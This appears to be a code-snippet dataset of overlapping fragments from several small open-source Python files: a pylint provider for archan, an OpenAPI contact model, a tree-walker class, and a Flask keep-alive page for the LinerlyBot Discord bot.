"matrix to generate. Returns: archan.DSM: instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__)",
"from pylint.lint import Run class LoggerWriter: def __init__(self, level): self.level = level def",
"write(self, message): if message != '\\n': self.level('from pylint: ' + message) class PylintProvider(Provider):",
"level): self.level = level def write(self, message): if message != '\\n': self.level('from pylint:",
"self.level = level def write(self, message): if message != '\\n': self.level('from pylint: '",
"LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args, do_exit=False) except TypeError: run =",
"pylint_args or [] sys.stdout = LoggerWriter(logger.debug) sys.stderr = LoggerWriter(logger.warning) try: run = Run(pylint_args,",
"= [] data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages')",
"sys.__stderr__ entities = [] data = [] for k, v in run.linter.stats['by_module'].items(): entities.append(k)",
"except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__ sys.sterr = sys.__stderr__ entities",
"self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier =",
"import sys try: from archan import Provider, Argument, DomainMappingMatrix, Logger from pylint.lint import",
"return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider, please install Archan and",
"sys.__stdout__ sys.sterr = sys.__stderr__ entities = [] data = [] for k, v",
"archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args or [] sys.stdout =",
"run = Run(pylint_args, do_exit=False) except TypeError: run = Run(pylint_args, exit=False) sys.stdout = sys.__stdout__",
"data for Pylint messages in a set of packages. Args: pylint_args (list): the",
"'Pylint Provider: Issues per Module' description = 'Number of Pylint messages per module.'",
"the depth of the matrix to generate. Returns: archan.DSM: instance of archan DSM.",
"v in run.linter.stats['by_module'].items(): entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider:",
"(int): the depth of the matrix to generate. Returns: archan.DSM: instance of archan",
"depth of the matrix to generate. Returns: archan.DSM: instance of archan DSM. \"\"\"",
"Returns: archan.DSM: instance of archan DSM. \"\"\" logger = Logger.get_logger(__name__) pylint_args = pylint_args",
"pylint_args (list): the arguments to pass to Pylint. depth (int): the depth of",
"entities.append(k) data.append([sum(v.values())]) entities.append('Messages') return DomainMappingMatrix(data=data, entities=entities) except ImportError: class PyLintProvider: \"\"\"Empty provider, please",
"PylintProvider(Provider): \"\"\"Pylint provider for Archan.\"\"\" identifier = 'archan_pylint.PylintProvider' name = 'Pylint Provider: Issues",
"pass to Pylint. depth (int): the depth of the matrix to generate. Returns:",
"message != '\\n': self.level('from pylint: ' + message) class PylintProvider(Provider): \"\"\"Pylint provider for",
"def __init__(self, level): self.level = level def write(self, message): if message != '\\n':",
"= level def write(self, message): if message != '\\n': self.level('from pylint: ' +"
] |
[] |
[
"self.name = name self.url = url self.email = email self.extensions = extensions and",
"email=None, extensions=None): self.name = name self.url = url self.email = email self.extensions =",
"contacts models module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name =",
"class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url =",
"name self.url = url self.email = email self.extensions = extensions and dict(extensions) or",
"<gh_stars>0 \"\"\"OpenAPI core contacts models module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None,",
"__init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url = url self.email =",
"url=None, email=None, extensions=None): self.name = name self.url = url self.email = email self.extensions",
"models module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name",
"core contacts models module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name",
"Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url = url",
"\"\"\"OpenAPI core contacts models module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None):",
"extensions=None): self.name = name self.url = url self.email = email self.extensions = extensions",
"self.url = url self.email = email self.extensions = extensions and dict(extensions) or {}",
"def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url = url self.email",
"= name self.url = url self.email = email self.extensions = extensions and dict(extensions)",
"name=None, url=None, email=None, extensions=None): self.name = name self.url = url self.email = email",
"module\"\"\" class Contact(object): def __init__(self, name=None, url=None, email=None, extensions=None): self.name = name self.url"
] |
[
"# SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\"",
"TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree =",
"logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def __init__(self, _tree, _node_associations):",
"Copyright (C) 2019 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log",
"walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree = _tree self._node_associations = _node_associations",
"SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic",
"\"\"\" Generic tree walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree = _tree",
"# Copyright (C) 2019 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections",
"class TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree",
"Generic tree walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree = _tree self._node_associations",
"logging import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class.",
"import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class. \"\"\"",
"log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def __init__(self,",
"(C) 2019 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log =",
"tree walker class. \"\"\" def __init__(self, _tree, _node_associations): self.tree = _tree self._node_associations =",
"= logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def __init__(self, _tree,",
"2019 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin')",
"Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class TreeWalker():",
"Intel Corporation # SPDX-License-Identifier: BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class",
"BSD-3-Clause import logging import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree",
"import logging import collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker",
"collections log = logging.getLogger('codebasin') class TreeWalker(): \"\"\" Generic tree walker class. \"\"\" def"
] |
[
"-*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-09 14:58 from",
"unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'),",
"Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from django.db",
"14:58 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies",
"coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__",
"[ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField(",
"django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations",
"[ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the",
"), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'), ), ]",
"2018-01-09 14:58 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration):",
"import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations =",
"from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ]",
"= [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ),",
"# Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from",
"-*- # Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals",
"by Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from django.db import",
"] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True,",
"1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from django.db import migrations, models",
"Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth',",
"'0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path',",
"migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.',",
"model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256,",
"migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [",
"class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory',",
"name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),",
"import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files',",
"utf-8 -*- # Generated by Django 1.11.9 on 2018-01-09 14:58 from __future__ import",
"# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-09 14:58",
"= [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of",
"from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies =",
"field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'), ),",
"dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0),",
"('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory',",
"__future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [",
"on 2018-01-09 14:58 from __future__ import unicode_literals from django.db import migrations, models class",
"Django 1.11.9 on 2018-01-09 14:58 from __future__ import unicode_literals from django.db import migrations,",
"models class Migration(migrations.Migration): dependencies = [ ('daiquiri_files', '0001_initial'), ] operations = [ migrations.AddField(",
"operations = [ migrations.AddField( model_name='directory', name='depth', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='directory', name='path', field=models.CharField(blank=True, help_text='Path"
] |
[
"import Flask app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head>",
"<code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and",
"color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in",
"alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new",
"with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands",
"and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as",
"\"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body",
"<a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\"",
"as the currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\",",
"style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version",
"logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2",
"href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\"",
"home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title>",
"</p> <hr> <p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\"",
"rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style>",
"sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click",
"to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto;",
"href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The",
"80%; margin: auto;\"> <style> figure message { top: 0; left: 0; position: absolute;",
"= Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\"",
"center; font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit site.",
"alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\">",
"0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size:",
"Flask app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link",
"<img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\"",
"#1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're",
"alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a>",
"</ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def keep_alive(): t =",
"<code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other",
"<a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports:",
"flask import Flask app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html>",
"command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the currency for",
"font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit site. <a",
"</head> <body style=\"width: 80%; margin: auto;\"> <style> figure message { top: 0; left:",
"commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands",
"new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr>",
"the <code>about</code> command.</li> <li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li>",
"style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p",
"alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>,",
"left: 0; position: absolute; } </style> <style> #message { margin: 0; padding: 12px",
"LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and",
"auto;\"> <style> figure message { top: 0; left: 0; position: absolute; } </style>",
"@app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot",
"main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto;",
"LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def keep_alive(): t",
"<code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\"",
"href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style> figure",
"} </style> <style> #message { margin: 0; padding: 12px 15px; background-color: #1e90ff; color:",
"text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit",
"site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot",
"<code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold",
"<li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run():",
"go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left:",
"margin: auto;\"> <style> figure message { top: 0; left: 0; position: absolute; }",
"absolute; } </style> <style> #message { margin: 0; padding: 12px 15px; background-color: #1e90ff;",
"<style> #message { margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align:",
"the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such as the",
"Page</title> </head> <body style=\"width: 80%; margin: auto;\"> <style> figure message { top: 0;",
"Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\">",
"<p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img",
"auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\"",
"block; margin-left: auto; margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\">",
"<html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%;",
"to go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block;",
"the <code>feeling</code> command.</li> <li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the",
"</body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def keep_alive(): t = Thread(target=run) t.start()",
"such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such as the",
"<style> figure message { top: 0; left: 0; position: absolute; } </style> <style>",
"<a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr>",
"such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li> <li>Fun commands such",
"<a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a> </p> <hr> <p>The new version of LinerlyBot with",
"top: 0; left: 0; position: absolute; } </style> <style> #message { margin: 0;",
"<li>Other miscellaneous such as the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li>",
"margin: 0; padding: 12px 15px; background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif;",
"margin-right: auto; border-radius: 50%;\" width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord",
"width=\"128\" height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img",
"in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p>",
"the <code>quote</code> command.</li> <li>Gold as the currency for LinerlyBot.</li> </ul> <hr> </body> </html>",
"of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul>",
"here to go to LinerlyBot's main page!</a></p> <br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display:",
"<a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style:",
"<hr> <p>The new version of LinerlyBot with <a href=\"https://discordpy.readthedocs.io/en/stable\">discord.py</a>.</p> <p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite",
"<link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl Page</title> </head> <body style=\"width: 80%; margin: auto;\">",
"<p><a href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the",
"id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main",
"height=\"128\"> <h2 align=\"center\">linerlybot-rewritten</h2> <p align=\"center\"> <a href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\"",
"style=\"width: 80%; margin: auto;\"> <style> figure message { top: 0; left: 0; position:",
"alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg?style=flat\"></a> <a href=\"https://pycqa.github.io/isort/\"><img alt=\"Imports: isort\" src=\"https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336\"></a>",
"<br> <img alt=\"LinerlyBot logo\" src=\"https://raw.githubusercontent.com/Linerly/linerlybot-rewritten/master/profile-picture.png\" style=\"display: block; margin-left: auto; margin-right: auto; border-radius: 50%;\"",
"0; position: absolute; } </style> <style> #message { margin: 0; padding: 12px 15px;",
"command.</li> <li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous",
"app = Flask(\"\") @app.route(\"/\") def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\"",
"font-size: 13px; } </style> <p id=\"message\">You're in LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here",
"href=\"https://discord.gg/a9Sy7gE\"><img alt=\"Discord Server\" src=\"https://img.shields.io/discord/551683447026876418?logoColor=1e90ff&style=flat\"></a> <a href=\"https://github.com/Linerly/linerlybot-rewritten/blob/master/LICENSE\"><img alt=\"License\" src=\"https://img.shields.io/github/license/Linerly/linerlybot-rewritten?style=flat\"></a> <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\"",
"href=\"https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands\"><img src=\"https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge\" alt=\"Invite LinerlyBot\"></a></p> <hr> <h1>Features</h1> <ul> <li>Informational commands such as the <code>help</code>,",
"background-color: #1e90ff; color: #fff; text-align: center; font-family: sans-serif; font-size: 13px; } </style> <p",
"for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080) def keep_alive():",
"<li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li> <li>Other miscellaneous such",
"the currency for LinerlyBot.</li> </ul> <hr> </body> </html> \"\"\" def run(): app.run(host=\"0.0.0.0\", port=8080)",
"def home(): return \"\"\" <!DOCTYPE=\"html\"> <html> <head> <link rel=\"icon\" href=\"https://linerly.github.io/assets/linerlybot/linerlybot.png\" type=\"image/png\"> <title>LinerlyBot Repl",
"<reponame>Linerly/linerlybot-rewritten from threading import Thread from flask import Flask app = Flask(\"\") @app.route(\"/\")",
"LinerlyBot's Replit site. <a href=\"https://linerly.github.io/linerlybot\">Click here to go to LinerlyBot's main page!</a></p> <br>",
